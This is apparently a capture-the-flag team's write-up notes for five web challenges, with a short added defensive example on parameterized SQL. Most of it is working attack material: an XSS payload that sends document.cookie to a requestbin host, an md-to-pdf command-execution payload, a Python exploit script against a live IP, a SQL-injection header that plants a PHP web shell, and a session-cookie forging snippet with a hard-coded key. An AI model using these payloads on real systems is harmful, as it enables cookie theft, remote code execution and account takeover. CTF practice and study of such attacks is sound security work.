# Web Challenges
## Kryptos Support (Poory, ShadowLord)
- Step 1: XSS: `<img src=x onerror=this.src='https://requestbin.io/x5z6v1x5/?'+document.cookie;>`
- Step 2: IDOR in Update Password with uid=001
## Webfluids (Poory)
https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Solution:
```
---js
{
css: `body::before { content: "${require("child_process").execSync("cat /flag.txt > /app/static/invoices/flag.txt")}"; display: block }`,
}
---
```
## Webamidst (Poory)
```python
import requests
IP = "206.189.126.72"
PORT = "32633"
f = {
    "background": ['exec("""import os\nos.system("cat /flag.txt > /app/application/static/css/flag.txt")""")', 230, 210],
    "image": """PUT BASE64 ENCODED PICTURE HERE"""
}
r = requests.post(f"http://{IP}:{PORT}/api/alphafy", json=f)
print(r.text)
r = requests.get(f"http://{IP}:{PORT}/static/css/flag.txt")
print("FLAG: " + r.text)
# Check manually for flag, because the webapp will close the connection
```
## Intergalactic Post (Poory)
SQL injection in an HTTP header (several possibilities for which one):
```
X-Forwarded-For: 127.0.0.1', 'ajaj@ajaj.com'); ATTACH DATABASE '/www/static/css/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
Then /static/css/lol.php?cmd=ls /
Finally /static/css/lol.php?cmd=cat <flagname>
```
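Why the header above works and what closes it, as an added example that is not part of the original notes or the challenge's code: string-built SQL behind a multi-statement API lets the header append statements, while bound parameters store it as data. The `subscribers` table, its columns, the function names and the marker-only header value are assumptions made for the demonstration.

```python
import ipaddress
import sqlite3

# Constructed header value with the same shape as the one above (quote break,
# stacked statement, trailing comment); the stacked statement is only a marker.
CONSTRUCTED_HEADER = "127.0.0.1', 'a@example.com'); CREATE TABLE marker (x TEXT);--"

def new_db():
    # Hypothetical schema: table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE subscribers (ip_address TEXT, email TEXT)")
    return db

def table_names(db):
    rows = db.execute("SELECT name FROM sqlite_master WHERE type='table'")
    return {row[0] for row in rows}

def subscribe_vulnerable(db, xff, email):
    # Before: header text is pasted into the SQL string and handed to an API
    # that runs every statement it finds, so the header can append statements.
    db.executescript(
        f"INSERT INTO subscribers (ip_address, email) VALUES ('{xff}', '{email}');"
    )

def subscribe_hardened(db, xff, email):
    # After: bound parameters keep the header as data, and execute() accepts
    # only a single statement.
    db.execute(
        "INSERT INTO subscribers (ip_address, email) VALUES (?, ?)", (xff, email)
    )
    db.commit()

def client_ip(xff):
    # Defence in depth: accept only a literal IPv4/IPv6 address (first hop of
    # the header); ipaddress.ip_address raises ValueError for anything else.
    return str(ipaddress.ip_address(xff.split(",")[0].strip()))

if __name__ == "__main__":
    for subscribe in (subscribe_vulnerable, subscribe_hardened):
        db = new_db()
        subscribe(db, CONSTRUCTED_HEADER, "user@example.com")
        print(subscribe.__name__, sorted(table_names(db)))
```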
## Mutation Lab (Poory)
LFI - https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-1582785
https://www.freeformatter.com/json-escape.html#ad-output
/app/router/index.js

/app/.env

Create the cookies locally, then simply copy them over:
```js
var cookieSession = require('cookie-session')
var express = require('express')

var app = express()

app.set('trust proxy', 1) // trust first proxy

app.use(cookieSession({
  name: 'session',
  keys: ['5921719c3037662e94250307ec5ed1db']
}))

app.get('/', function (req, res, next) {
  req.session.username = "admin"
  // Write response
  res.end(req.session.username + ' pls')
})

app.listen(3000)
```